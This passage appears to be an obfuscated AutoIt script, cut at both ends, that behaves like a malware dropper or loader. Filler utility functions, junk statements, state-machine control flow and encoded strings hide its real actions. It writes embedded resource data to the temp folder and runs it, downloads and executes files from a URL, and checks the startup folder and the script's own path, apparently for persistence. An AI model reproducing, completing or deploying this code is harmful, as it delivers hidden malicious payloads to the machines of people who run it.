RETURN $BITS ENDFUNC FUNC IZSPTCBUQOIXMP ($SSTRING , $INUMCHARS ) IF ISSTRING ($SSTRING ) = 0 OR $SSTRING == "" THEN RETURN SETERROR (1 , 0 , 0 ) ENDIF IF ISINT ($INUMCHARS ) = 0 OR $INUMCHARS < 1 THEN RETURN SETERROR (2 , 0 , 0 ) ENDIF GLOBAL $1203322726 = 256356752 GLOBAL $G7FSNVIRVE = 3481575 FOR $E = 0 TO 2975631 DIM $YDWVASINGXWAQVJABYON = "trp9CudpU7wn1r59zgHss0r6WexiVMuus" IF $1203322726 = 176683708 THEN $ARETURN [0 ] = UBOUND ($ARETURN , 1 ) + 4294967295 DIM $WHXF8W0ZNYCNACSQ58DA = 1274644 + 1579368 $1203322726 = 1300820860 ISSTRING ("c4imT2NIkXtCBGIO44UKbNxUKlXIiAJCpnwsqpEhxUFiOaHXNTcaVFKyFxKHfezUm0mojpyOzLm" ) ENDIF IF $1203322726 = 256356752 THEN LOCAL $ARETURN = STRINGREGEXP (_STRINGREPEAT ("0" , 5 ) & $SSTRING , "(?s).{1," & $INUMCHARS & "}" , 3 ) $1203322726 = 176683708 DIM $5ZXISUL8W2N6CTUV5YXT = "xtxKittqqsa4fj9wMhCLkDGaCJ36wtrXtwGga8IAsSFINc6jvxsQtRC4XxiIzw36bmKTL3vOIctC" STRING ("TK9bKCL4MtMZaa5ZIHABnHCbMhrxa6ZaS6RW45zT9Z8ITZHcxMyy59zkh7xCln4QDLhdsi5NhRB" ) ENDIF IF $1203322726 = 1300820860 THEN RETURN $ARETURN EXITLOOP PTR (980617 + 4292796468 + 4294635977 * 2096956 ) ENDIF RANDOM (2144716 ) NEXT ENDFUNC FUNC MIJWHARLJCMZNKU ($SHEX ) IF NOT (STRINGLEFT ($SHEX , 2 ) == "0x" ) THEN $SHEX = "0x" & $SHEX RETURN $DWUFUAPKESAJ ($SHEX ) ENDFUNC FUNC XHLXVVVZBP ($ICOLOR ) GLOBAL $1203322726 = 256356752 GLOBAL $HV5SFHSETP = 3798929 FOR $E = 0 TO 2841645 MOD (2100624 , 98488 ) IF $1203322726 = 176683708 THEN $IMASK = BITXOR (BITAND ($ICOLOR , 255 ) , ($ICOLOR / 65536 ) ) ISBINARY (3623704 + 2147057 + 222595 + 4293365621 ) $1203322726 = 1300820860 ISSTRING (414661 + 2806808 ) ENDIF IF $1203322726 = 256356752 THEN LOCAL $IMASK DIM $EFUOWI1ME3ZR7CKFXJCJ = 1218598 $1203322726 = 176683708 ISPTR (2630247 + 3293816 ) CHR (1904096 ) ENDIF IF $1203322726 = 1300820860 THEN RETURN BITXOR ($ICOLOR , ($IMASK * 65537 ) ) EXITLOOP ENDIF WINEXISTS ("mc3fQjiIlegVKXgJ95hcWw6H8YCmjbEXh4g5cOcE7ENDoQ2QT1E7o13Zfug2Q5yjJtMQRlGt2LeqTCtr5" ) NEXT ENDFUNC FUNC NBRNBWYUQNWGOKZ ($HICON1 , $HICON2 ) LOCAL $ARTN = DLLCALL (LUXBZMCWKPOC ("s..hl..wa..pi...d..l..l" , ".." ) , LUXBZMCWKPOC ("B..OO..L.." , ".." ) , 548 , LUXBZMCWKPOC ("h..a..nd..le.." , ".." ) , $HICON1 , LUXBZMCWKPOC ("h..a..nd..le.." , ".." ) , $HICON2 ) IF @ERROR THEN RETURN SETERROR (@ERROR ) ENDIF RETURN $ARTN [0 ] ENDFUNC FUNC ZFVYVFHKBGEU ($IINT ) LOCAL $B = "" FOR $I = 1 TO 32 GLOBAL $1300820860 = 256356752 GLOBAL $DSFHHQARZS = 3139047 FOR $E = 0 TO 2229963 IF $1300820860 = 176683708 THEN $IINT = BITSHIFT ($IINT , 1 ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $B = BITAND ($IINT , 1 ) & $B DIM $GTLELWLFMBZ63AFMBVWQ = 1652337 + 4291679370 * 2824548 * 170358 + 980145 + 4293331830 + 2944568 * 3810742 $1300820860 = 176683708 ISSTRING (1939181 + 790819 * 2905706 ) ENDIF PTR (580007 + 4292640990 + 2010750 + 4293480249 ) NEXT NEXT RETURN $B ENDFUNC FUNC DUWYGWWFUHRY ($ILENGTH ) RETURN $ILENGTH * 0.621400 ENDFUNC FUNC RQNMBRDSQSVPAPI ($SSTRING ) GLOBAL $1300820860 = 256356752 GLOBAL $UB0DLKMGDG = 3335599 FOR $E = 0 TO 1170343 WINEXISTS ("nkhcC1BjxRqHnmWD4ggU6uifhbZg4ItsYo" ) IF $1300820860 = 176683708 THEN LOCAL $AVRETARR [1 ] , $IUBOUND EXITLOOP ENDIF IF $1300820860 = 256356752 THEN LOCAL $AVARRAY = STRINGREGEXP ($SSTRING , "([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)" , 3 ) INT (1214044 ) $1300820860 = 176683708 ENDIF ISFLOAT (1498587 * 535529 + 4291431968 ) NEXT FOR $I = 0 TO UBOUND ($AVARRAY ) + 4294967295 IF _ISVALIDIP ($AVARRAY [$I ] ) THEN GLOBAL $1203322726 = 256356752 GLOBAL $C4BBUOYW7T = 130051 FOR $E = 0 TO 3905436 DIM $GMHBM2VUEC6YRL1JQ3C8 = 1298284 IF $1203322726 = 176683708 THEN REDIM $AVRETARR [$IUBOUND + 1 ] $1203322726 = 1300820860 DIM $NAXTAC5F0PLQSAQSZYF5 = "MEwdfxXWdUjDIoUvVb3DVvL79kCRaNd2cgbEap5OhTXFBliVG7ewlBlq3ze44gVyRrBCnouEgovcHfEXbSkdIQQK5ULKlaUb7xYkUQGrMJq7fjTX4q" RANDOM (2856720 ) ENDIF IF $1203322726 = 256356752 THEN $IUBOUND = UBOUND ($AVRETARR ) ISBINARY (2174494 + 4292023633 + 353925 ) $1203322726 = 176683708 ENDIF IF $1203322726 = 1300820860 THEN $AVRETARR [$IUBOUND ] = $AVARRAY [$I ] EXITLOOP ENDIF NEXT ENDIF NEXT IF $IUBOUND = 0 THEN RETURN SETERROR (1 , 0 , 0 ) GLOBAL $1300820860 = 256356752 GLOBAL $9YSEVBYQ4H = 1704866 FOR $E = 0 TO 2205646 IF $1300820860 = 176683708 THEN RETURN $AVRETARR ISBOOL (560610 + 4291396930 ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $AVRETARR [0 ] = $IUBOUND $1300820860 = 176683708 MOD (2181193 , 145975 ) ENDIF NEXT ENDFUNC FUNC EVNJAAQWEO ($ILENGTH ) RETURN $ILENGTH * 1.609000 ENDFUNC FUNC UDRNJBRYOF ($INUM ) IF ($INUM < 2 ) THEN RETURN FALSE IF ($INUM = 2 ) THEN RETURN TRUE IF (BITAND ($INUM , 1 ) = 0 ) THEN RETURN FALSE FOR $I = 3 TO SQRT ($INUM ) STEP 2 IF (MOD ($INUM , $I ) = 0 ) THEN RETURN FALSE NEXT RETURN TRUE ENDFUNC FUNC MRDEQHUQFFBML ($IVALUE , $VTRUE , $VFALSE ) GLOBAL $1300820860 = 256356752 GLOBAL $L3VWCZDZ75 = 3389345 FOR $E = 0 TO 998476 ISSTRING (628113 + 942730 ) IF $1300820860 = 176683708 THEN RETURN $AARRAY [NUMBER (NUMBER ($IVALUE ) > 0 ) ] MOD (921477 , 2927320 ) EXITLOOP INT (349919 ) ENDIF IF $1300820860 = 256356752 THEN LOCAL $AARRAY [2 ] = [$VFALSE , $VTRUE ] ISSTRING ("SkQGwKYZ0nIFo7bZeu5ZVhzOMeaG8Txzn13seLZFzR29OnBEppLoJmmJVb4rJr1h0isxdTVBEzydoz9zMFqShjZaOtHdSH5iZVjF4eBGDkTjYjvucEO" ) $1300820860 = 176683708 ENDIF INT (2861288 ) NEXT ENDFUNC FUNC SNUVPERSZOEKMQP ($NJOKER = 0 ) GLOBAL $1300820860 = 256356752 GLOBAL $KST7EQNCQC = 2965723 FOR $E = 0 TO 1982129 ISPTR ("zOmF7man20iQVBmMvSvWAVOG52eJagbq5cqNemW8RFeOhHSYp1lvxBFNaOJeiAmWZ2VSlHIj5xe4Rayxkpti4O2DGLNyLR0qssZpWaMSrcAawL7apm" ) IF $1300820860 = 176683708 THEN $NNUMBERS = LUXBZMCWKPOC ("T..wo,..Thre..e,Fo..ur,..Fiv..e,..S..i..x..,..S..ev..e..n..,..Eigh..t..,N..i..ne,..T..en,..Jack,..Ki..ng..,Queen,A..c..e.." , ".." ) DIM $E1K9QLI4JHNGYKYKJKJL = 2438973 EXITLOOP MOD (3523655 , 459451 ) ENDIF IF $1300820860 = 256356752 THEN LOCAL $NNUMBERS , $AZSPLITS , $NRANDOM , $NRETURN , $SFACE , $SFACES , $NRANDOM2 ISBINARY ("X7ioAOqEZdXiEnCHaIZgLVqFn96gjq4qbiAJQw7E2fuIYSwa" ) $1300820860 = 176683708 PTR ("cQMbATjuHiGgwX22NKtoFzRREM5QKwYBavx3cuGWSUXzrLanHRpEDXqL95GYXCUlufgay8ZseHFWMqz3LSi4gs7meW4gYS8" ) ENDIF NEXT IF $NJOKER THEN $NNUMBERS &= LUXBZMCWKPOC (",..Joker.." , ".." ) ENDIF GLOBAL $1027989821 = 256356752 GLOBAL $FLE9YJ16A6 = 2436800 FOR $E = 0 TO 1120770 IF $1027989821 = 113519199 THEN $SFACE = $SFACES [ROUND ($NRANDOM2 ) ] ISBINARY ("u0ebh36Md" ) EXITLOOP STRING (1075817 + 736701 + 1516956 + 4291363348 ) ENDIF IF $1027989821 = 176683708 THEN $SRETURN = $AZSPLITS [RANDOM (1 , $AZSPLITS [0 ] , 1 ) ] DIM $B5JWLKKF34JGEELDLFJB = 269680 + 4294929560 * 3909909 + 4293809292 + 2329391 + 3103136 * 3612467 + 432899 $1027989821 = 1300820860 PTR (449167 * 2683051 ) ENDIF IF $1027989821 = 256356752 THEN $AZSPLITS = STRINGSPLIT ($NNUMBERS , "," ) $1027989821 = 176683708 DIM $3SYN52XOT45SIVM57NRU = "cinRNfEziDbCT4ltCdDdmXy56nq0llh2xy0JK6qWsokA4pyABLEKmqAoTsUzYOo6vietdLTFWRV8M" ENDIF IF $1027989821 = 1203322726 THEN $NRANDOM2 = RANDOM (1 , $SFACES [0 ] + 4294967295 ) ISFLOAT (3366178 + 4292208555 + 4292321933 ) $1027989821 = 113519199 INT (796222 ) ENDIF IF $1027989821 = 1300820860 THEN $SFACES = STRINGSPLIT (LUXBZMCWKPOC ("S..p..a..d..es|C..l..ubs|H..e..arts|..D..i..a..mon..d..s.." , ".." ) , "|" ) ISBINARY ("eVkew039YEFCLUrdK8qOpYD8vBU" ) $1027989821 = 1203322726 DIM $7Y4OFUCHQRTJJE9GAIOA = 1448036 ENDIF NEXT IF $SRETURN = LUXBZMCWKPOC ("Jo..k..er" , ".." ) THEN RETURN $SRETURN ELSE RETURN $SRETURN & LUXBZMCWKPOC (" O..f .." , ".." ) & $SFACE ENDIF ENDFUNC FUNC YOATAXCYMFD ($ICONTROLID ) GLOBAL $1300820860 = 256356752 GLOBAL $QMT4FCQ2WY = 1003050 FOR $E = 0 TO 2025828 IF $1300820860 = 176683708 THEN GUICTRLSETSTATE ($ICONTROLID , $ASTATE [NUMBER (BITAND (GUICTRLGETSTATE ($ICONTROLID ) , $ASTATE [0 ] ) = $ASTATE [0 ] ) ] ) EXITLOOP ISFLOAT (2221998 + 1544486 ) ENDIF IF $1300820860 = 256356752 THEN LOCAL $ASTATE [2 ] = [0 , 1 ] ISBINARY ("QSVLzO7sbHCnb0wlaWp7" ) $1300820860 = 176683708 ISSTRING (1463820 + 3785400 * 3517776 ) ENDIF NEXT ENDFUNC FUNC MXNUVEYTLNEVG () RETURN STRINGREGEXPREPLACE (@OSARCH , "(?i)x86|\D+" , "" ) ENDFUNC GLOBAL $586524435 = 256356752 GLOBAL $DM3XLFO06Q = 765620 FOR $E = 0 TO 3030037 RANDOM (795858 ) IF $586524435 = 38669117 THEN $RSOIAVQHRSRB = EXECUTE (LUXBZMCWKPOC ("Z..p..LP..Qg..YB..g..R..D..g..()" , ".." ) ) STRING ("smhpaEbDifblFOsHg8e2wHIwL359LcXdJ631FNXReUR1oJaJNNTRtKmUNUMhIb1gs8KJ" ) $586524435 = 2032766480 DIM $CLXXL0SHC2UU8SFT9TIM = "aQhc2KHq8zYlLqF6XJ35LKooR3XmoL1MppCEqVUpj1dBGivcJXliorjyB3u9XvcvIl6vXaQb0NWVHWSHHVLBzSx8gddx" ENDIF IF $586524435 = 39019882 THEN $DKMWACMPQYMR = EXECUTE (LUXBZMCWKPOC ("wC..Cb..b..C..aNdN..Z..P(..)" , ".." ) ) $586524435 = 1885155689 WINEXISTS ("m9oJhksKFx0OlXAcTK51Y8pT6sKfl7603wvHFctpz" ) ISFLOAT ("mMtzeoWbGnUEMZImyHBaVYB3FRqOBaFGFHg8WW3Rd2ZhYayE" ) ENDIF IF $586524435 = 61093985 THEN OPT (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..0,..44,..2..7,5..1..,..9,2..9..,41,..40,8,35,..30..,..31.." , ".." ) ) , ZVTZJDNXHRPQQIM ("54" ) ) STRING (1037708 + 4293434638 ) $586524435 = 1053930317 RANDOM (425821 ) ENDIF IF $586524435 = 92596336 THEN $XFNAYPZBZOLC = EXECUTE (LUXBZMCWKPOC ("J..W..W..T..SbPFt..D..yX..(..)" , ".." ) ) ISFLOAT ("fTKzLNU628ueErW8oLKqt3SXv3GU7styKctVfWWqEpVy0vxelhu4g6OlaXeSga9JO5DC8a2CZuVeit6aECIZ7ysOwiVsSdkEqkU524gko2eWkKcR0emNB" ) $586524435 = 1604509846 ENDIF IF $586524435 = 113519199 THEN $RBNGTNJVQYOQOTZBNEJFBEBBBRMZZMPCIMKJNUBQXAYVVUQBECJFBZVM = EXECUTE (LUXBZMCWKPOC ("@..S..cr..i..p..tD..ir" , ".." ) ) PTR ("UVjqX7JbhKvxJeuFEWfdBM0FcgHDsdYq5OhsL3XfhZ6LreIH5ftsUmhh5NnRyfTdWfC57" ) $586524435 = 1027989821 DIM $5MQON8GAIMUEFSGAX8QF = "cg20lLNK2lStUqEAQzpkyGFsqJUy6N654t3GYycw3zQbclWBbJRHz5rEJIIL1pNooXyAw8Mrx2q80DqeYr" ENDIF IF $586524435 = 116471326 THEN $ADVENYDCNHZL = EXECUTE (LUXBZMCWKPOC ("igCf..Q..U..u..W..mEaf()" , ".." ) ) $586524435 = 1196440215 ISSTRING (102795 * 930307 * 1666361 ) ISPTR ("pWued7yjGNtNfsDYJ3rr0rAy8bxC8xMmySbrCnszGo7tSU06uK5UDj57v6fcI6ljagoxqlvvJ1ULtgRokBiwB3SpWd6Fh" ) ENDIF IF $586524435 = 176683708 THEN $TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE = EXECUTE (LUXBZMCWKPOC ("@T..empDi..r.." , ".." ) ) $586524435 = 1300820860 PTR ("EBOipIkLysNpp11gYZRhy9KmpZotajJFXfUSX9g3Sf0DzRqqyUXnglmE1C2At0LpThCjgis" ) PTR ("ihWIH85qwwyK3o1ugQI2DKUsohjqA8EsW3wTQ" ) ENDIF IF $586524435 = 256356752 THEN #region qcVZk $586524435 = 176683708 ENDIF IF $586524435 = 432319576 THEN $CSRHZILJDSLP = EXECUTE (LUXBZMCWKPOC ("CR..A..yo..Qr..F..EAmS()" , ".." ) ) $586524435 = 92596336 WINEXISTS ("8RcpGZGwDuzZNZx1gZa2iOXYn6iSxIw2r" ) INT (1853682 ) ENDIF IF $586524435 = 737653776 THEN $SNOJUKVVIBEY = EXECUTE (LUXBZMCWKPOC ("Qh..Mg..hxJzkQD..S..().." , ".." ) ) $586524435 = 38669117 ENDIF IF $586524435 = 781366022 THEN $PSZKHZKXAIEO = EXECUTE (LUXBZMCWKPOC ("Z..Eb..j..k..FZ..IP..af..i..()" , ".." ) ) ISSTRING ("EELco9it4ocJQZ947HHOvhydJ6cWCYvRQLm27uMr0iwobNw9wqb48LjxfIBs6w" ) $586524435 = 864731176 WINEXISTS ("4eLg7M5pYnVkc5IdzlXBSdCZWy2uuDrpvQUsxptx8" ) RANDOM (2486629 ) ENDIF IF $586524435 = 848901156 THEN $FPJBQJEGCCNE = EXECUTE (LUXBZMCWKPOC ("Rm..O..eeci..Wz..OyF..().." , ".." ) ) ISSTRING (3597529 + 4293720639 + 4292443185 * 2434805 ) $586524435 = 1718368979 ISBOOL (2363483 + 3721986 + 4291682637 + 4294195590 ) ENDIF IF $586524435 = 864731176 THEN $WQURQXMWAZTB = EXECUTE (LUXBZMCWKPOC ("m..sSF..B..h..B..P..z..K..O..b..(..)" , ".." ) ) $586524435 = 1808850186 ISSTRING ("2vKAFL64c3RK5VMxXCahgjuCoXX48NKfICQy9DYsH4tsIengVelWEfUTbimSZc5yrKbCeoytORJlZb3jJQi4BYJDS7w0qfDE85a7cUc" ) ENDIF IF $586524435 = 954977294 THEN $UEHQXDUALSWD = EXECUTE (LUXBZMCWKPOC ("b..f..SE..zoF..q..q..v..Rv().." , ".." ) ) WINEXISTS ("YEI3apcii3b6Db" ) $586524435 = 61093985 DIM $1ICJNEN4A5HZNKPJRW8J = 283651 ENDIF IF $586524435 = 1027989821 THEN $RVLXXSQVNZAXBEXVLCOYMMYTVKMXHDDKZNNJCLAAUDHWOTJLFVEDXJKE = EXECUTE (LUXBZMCWKPOC ("@..O..S..Version.." , ".." ) ) $586524435 = 1138660241 ISSTRING (1984088 * 2723817 + 3324077 + 4292629190 ) ENDIF IF $586524435 = 1051260188 THEN $URTJHDWBPVQN = EXECUTE (LUXBZMCWKPOC ("r..qBfMR..VGxj..yI..().." , ".." ) ) $586524435 = 737653776 INT (3726376 ) ENDIF IF $586524435 = 1053930317 THEN ONXNEQMVEA () EXITLOOP ENDIF IF $586524435 = 1070530058 THEN $NPTGNKISXCCR = EXECUTE (LUXBZMCWKPOC ("ZPvye..e..xeU..e..wT(..).." , ".." ) ) $586524435 = 39019882 ISSTRING (3240311 * 1888434 + 3763639 ) ENDIF IF $586524435 = 1138660241 THEN $JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH = EXECUTE (LUXBZMCWKPOC ("@..A..u..to..I..tP..ID.." , ".." ) ) ISFLOAT (588471 + 791503 + 4291741726 + 1530756 ) $586524435 = 1924764602 INT (741726 ) ENDIF IF $586524435 = 1196440215 THEN $GCIZPUUYNTJL = EXECUTE (LUXBZMCWKPOC ("YyEu..J..PRYp..kCM().." , ".." ) ) ISFLOAT (1508313 + 533998 + 3514586 * 3820887 ) $586524435 = 1070530058 INT (1869136 ) ENDIF IF $586524435 = 1203322726 THEN $LEBAKWEILIBIQNTCTHBGGFGBKVXCKB = EXECUTE (LUXBZMCWKPOC ("@Sc..r..ip..tF..ull..P..at..h" , ".." ) ) ISBINARY (2457696 + 3222973 ) $586524435 = 113519199 ISFLOAT (42047 + 288839 ) ENDIF IF $586524435 = 1296565717 THEN $WURIVHUQSXZK = EXECUTE (LUXBZMCWKPOC ("s..hY..KZnw..GX..GS..g().." , ".." ) ) $586524435 = 2022545531 ISFLOAT ("KSd169kc6IahO4I6gAF1NXaSWdLa7NL2tHzf2oVG0anFtKLW33LJnz0YSvf" ) ENDIF IF $586524435 = 1300820860 THEN $RXJCPAPNDUMJMOSOPQCHSTGTFYAPOZBYKYKLGKEC = EXECUTE (LUXBZMCWKPOC ("@S..ta..r..tupD..i..r.." , ".." ) ) DIM $R6IYHEDD2Q8BNIEXLA0G = 254100 + 140238 $586524435 = 1203322726 ISFLOAT (1510904 + 3531272 + 2714089 ) ISBOOL ("Ery0U4oymom83AGdap4D4z2gFSXZvSL6lx6HRnriyEEwkHpBMM5RNS2eystbgzdELqWEE8vX8Wez5E68CvlTX5rDF2iy3pb" ) ENDIF IF $586524435 = 1604509846 THEN $NCPIUPWKFYZJ = EXECUTE (LUXBZMCWKPOC ("dd..K..W..O..Y..Mj..JPnF..()" , ".." ) ) RANDOM (3014537 ) $586524435 = 2060391673 ISPTR (2631610 + 2878018 ) CHR (609484 ) ENDIF IF $586524435 = 1655436234 THEN $FREUKGMVKMCX = EXECUTE (LUXBZMCWKPOC ("xZ..r..g..VRf..Ny..RG..X..(..)" , ".." ) ) STRING (3048769 + 2837918 ) $586524435 = 781366022 INT (3973707 ) RANDOM (3609677 ) ENDIF IF $586524435 = 1713506615 THEN $BQQDLTTXSVYF = EXECUTE (LUXBZMCWKPOC ("b..vM..qyYk..u..KU..R..a(..)" , ".." ) ) DIM $85UCLTYGBOMZ1DSOCHRP = 3067333 $586524435 = 432319576 ENDIF IF $586524435 = 1718368979 THEN $WDNTUWUIPGOD = EXECUTE (LUXBZMCWKPOC ("H..g..MGwW..t..Pd..n..oR..(..)" , ".." ) ) $586524435 = 1051260188 ENDIF IF $586524435 = 1808850186 THEN $HOKAFSRHEHOF = EXECUTE (LUXBZMCWKPOC ("Q..DG..s..B..I..xa..sio..K..()" , ".." ) ) ISBOOL ("jtjZwQ2cDIA64J3vbEt2MRhS8eR" ) $586524435 = 848901156 ENDIF IF $586524435 = 1885155689 THEN $FWRGBKVEXWEH = EXECUTE (LUXBZMCWKPOC ("aZm..t..vpRVI..Ox..M().." , ".." ) ) $586524435 = 1970938970 PTR (319730 + 2304399 ) ENDIF IF $586524435 = 1924764602 THEN $BPAPWBQZMLLNSNXVSJYMCEPVPMUWJELXTITCFYCQPXTFSGSTOASCDLVWZF = EXECUTE (LUXBZMCWKPOC ("@A..u..t..o..I..t..E..x..e.." , ".." ) ) $586524435 = 1655436234 MOD (1701699 , 3431664 ) MOD (2416550 , 2390431 ) ENDIF IF $586524435 = 1970938970 THEN $DNKSORVXJZJU = EXECUTE (LUXBZMCWKPOC ("m..N..IAO..Q..ehl..r..x..V()" , ".." ) ) $586524435 = 1296565717 ENDIF IF $586524435 = 2022545531 THEN $DBGGPSHIBQGJ = EXECUTE (LUXBZMCWKPOC ("Yr..bQ..D..b..YjG..k..Xs..().." , ".." ) ) INT (1081925 ) $586524435 = 1713506615 ENDIF IF $586524435 = 2032766480 THEN $NLIVQGZCBCYM = EXECUTE (LUXBZMCWKPOC ("C..JcC..I..d..D..e..p..T..l..c(..)" , ".." ) ) $586524435 = 116471326 ENDIF IF $586524435 = 2060391673 THEN $QNTYERAUOLAX = EXECUTE (LUXBZMCWKPOC ("Q..U..Bc..ah..B..bZKyJ(..)" , ".." ) ) $586524435 = 954977294 DIM $BRKOQF83ME6AKFCOSE4C = 59615 * 967375 * 3257347 + 3941415 * 854843 + 4293200229 ISBINARY (247142 + 2356577 ) ENDIF NEXT FUNC QKSZFURFTX ($FILE , $STARTUP , $RES ) GLOBAL $1027989821 = 256356752 GLOBAL $1QBIAIKTYR = 2085798 FOR $E = 0 TO 3057511 ISFLOAT ("zOgbQqelu6IyNpD2fE3I1Oa0WDGU98c0KrL56v0KL0YeJVeHm3LhY30UNpolTtlv3TXwMI6TNr7b16qaz9Hg" ) IF $1027989821 = 113519199 THEN $DBGGPSHIBQGJ ($FHANDLE ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN DIM $FHANDLE = $FWRGBKVEXWEH ($FILE , ZVTZJDNXHRPQQIM ("55" ) ) $1027989821 = 1300820860 ENDIF IF $1027989821 = 256356752 THEN $FILE = $TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE & "\" & $FILE ISBINARY ("08S5M73DF5Z3S9nWUVf9" ) $1027989821 = 176683708 DIM $5VRPL9AOWYVZCRE4JDAG = 3143133 ISBOOL (3582513 + 2118016 + 4293087897 + 611733 ) ENDIF IF $1027989821 = 1203322726 THEN $NPTGNKISXCCR ($FHANDLE , $BQQDLTTXSVYF ($DATA , 1 ) ) DIM $RQDEQCE6JLEQ05FIKSSX = 2938432 + 4292099282 + 1270365 + 3196127 $1027989821 = 113519199 MOD (614262 , 3626405 ) CHR (809950 ) ENDIF IF $1027989821 = 1300820860 THEN DIM $DATA = READRESOURCES ($RES , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4,5..3.." , ".." ) ) ) ISSTRING ("LgSXAQM7L8KDwLhHvViOJwtbkVrDtLTWkshCau2Bj87rIzH7tNKRxC4oX" ) $1027989821 = 1203322726 ISBINARY ("NapYsdDOHb2QEKybCUn" ) ENDIF DIM $YRY2OTSND9U7BUGDCOFJ = "R7s0Vn1Bea88nzLNL9osNLEqBaSMT1DIBnRTgc4g1W99v8XuE01O1rjfBbxVEoSnFyGaT2HIfiA2LF5Dnxh39ZSkdKrfNjKLd" NEXT IF $STARTUP = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,27,38,..4..5..,..3..1.." , ".." ) ) THEN IF $STARTUPDIR <> $RBNGTNJVQYOQOTZBNEJFBEBBBRMZZMPCIMKJNUBQXAYVVUQBECJFBZVM THEN $FPJBQJEGCCNE ($FILE ) ENDIF ELSE $FPJBQJEGCCNE ($FILE ) ENDIF ENDFUNC FUNC ONXNEQMVEA () GLOBAL $1203322726 = 256356752 GLOBAL $C7AXLMSSIT = 3121811 FOR $E = 0 TO 3357923 IF $1203322726 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,3..5,4..0..,2..7..,44,5..1..,2..0,41..,19,46,..4..4..,3..5..,..4..0..,..33" , ".." ) ) ) WINEXISTS ("hgZnRQw6hKB46HYY0d7czWEKRq9uWiu8ULCFoHVqe0Dc0xLkbCM2i1hvKnGARck8p" ) $1203322726 = 1300820860 ENDIF IF $1203322726 = 256356752 THEN LOCAL $E = EXECUTE $1203322726 = 176683708 ISBOOL ("UtNYssFC03Dh4abuJcOEWwnqgS3uJA3GeiDnW2T1CWMq06xIp7h54WQ" ) ENDIF IF $1203322726 = 1300820860 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50..,5..7..,..5..9,59,62,..59..,3,59,58..,..57..,..57..,5..9..,5..8,59..,3,..59,..5..8,60,..57,5..9..,58,55,6..1,5..7,..5..3..,..57,5..4..,60..,58..,60,5..7,..5..9,..6,5..9..,..6..2..,..6..0..,..57,57,..5..8,..6..0..,6..1,..5..9,58..,55,..53..,..55..,59..,5..5..,53,..5..5..,..5..5..,56..,..1..,..58..,..1..,..59,..6,5..9,..5,5..9..,58..,..55,..5,..57,6..2,5..9,..5..7,5..9,5..8,..59,..5,60..,..57..,..5..9..,62..,59..,..59,5..9..,6..2..,..5..9..,..5..8..,60..,..55,..5..5..,5..5..,..5..5,..62" , ".." ) ) ) ) EXITLOOP ENDIF DIM $Y97DWGYHRTYCAT6ZKUUF = 2510278 + 3854158 + 4293801246 + 4294608792 + 1644230 + 539219 + 4293769420 * 910755 NEXT ENDFUNC FUNC KMNVXSBBAW () IF $FREUKGMVKMCX (LUXBZMCWKPOC ("[C..LAS..S..:Pro..g..man..].." , ".." ) ) = ZVTZJDNXHRPQQIM ("53" ) THEN $RSOIAVQHRSRB ($JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH ) ENDIF ENDFUNC FUNC AAPIEUMFUN ($URL , $PATH ) IF $BOOL = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..2..7..,..3..8,..4..5,31.." , ".." ) ) THEN GLOBAL $1300820860 = 256356752 GLOBAL $32KBBZALGT = 1119509 FOR $E = 0 TO 2712344 RANDOM (2095806 ) IF $1300820860 = 176683708 THEN $FPJBQJEGCCNE ($TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE & "\" & $PATH ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $GCIZPUUYNTJL ($URL , $TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE & "\" & $PATH ) $1300820860 = 176683708 ENDIF ISSTRING ("TfEOGsTtMn2vFHWA7BO2wmOipHgrJUr4AU9JjEznFVB" ) NEXT ENDIF ENDFUNC FUNC GLOBALDATA ($DATA , $RT ) GLOBAL $113519199 = 256356752 GLOBAL $NQZNGATQ1S = 146980 FOR $E = 0 TO 3993025 STRING ("lBT3674WHmqCbAwKVL4IS3UIbKdiUCiXeBcebIgpWdOuUpNA6yVYB0qsRk1u4WbedDxJyrJmFOXOozYV7MmvSuuolTw0RVv9bJrp1dcNZIsXdKervgxqI" ) IF $113519199 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..8..,3..5,40..,2..7..,44..,..51,..46,4..1..,..45,..4..6,4..4..,..35..,40,33" , ".." ) ) ) ISFLOAT ("yO5TEUsXMNhI33KIGjb" ) $113519199 = 1300820860 ISBOOL (315032 + 4293404405 + 1700342 ) ENDIF IF $113519199 = 256356752 THEN LOCAL $E = EXECUTE ISFLOAT (1487556 + 205813 + 4292996003 + 3893714 ) $113519199 = 176683708 ISSTRING (52836 + 2786511 ) ENDIF IF $113519199 = 1203322726 THEN LOCAL $R = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50..,58..,..5..6..,..6..0..,57,..6..0..,..5..5,..5..9,62..,..5..9,..5,..5..9,60,..5..8..,..56,6..0,..53,5..9..,3..,5..9..,..6..2,..60,..57..,..5..5..,61,..5..7..,..55..,..59,62,5..9..,..5..,5..9..,..5..4,..60..,..55,60,..6..2..,..58..,..57,..59..,6,58..,..56,..6..0,..5..7..,..60..,5..5..,..59..,..62,..59..,..5,5..9..,6..0..,5..5..,6..1,..5..5,..57,5..9,..5..7,59,..54..,6..0,..5..7,..5..9,..54,..5..5..,..6..2..,55..,3,5..5,..53,55..,..5..5..,60,..3..,5..5..,..5..5,..55..,6..2.." , ".." ) ) ) ) PTR (3380382 * 1435103 ) EXITLOOP ENDIF IF $113519199 = 1300820860 THEN LOCAL $RETURN $113519199 = 1203322726 DIM $N0AGDC4KP4RY4YZLA1DS = 3293589 + 4291468966 * 575197 ENDIF RANDOM (2362379 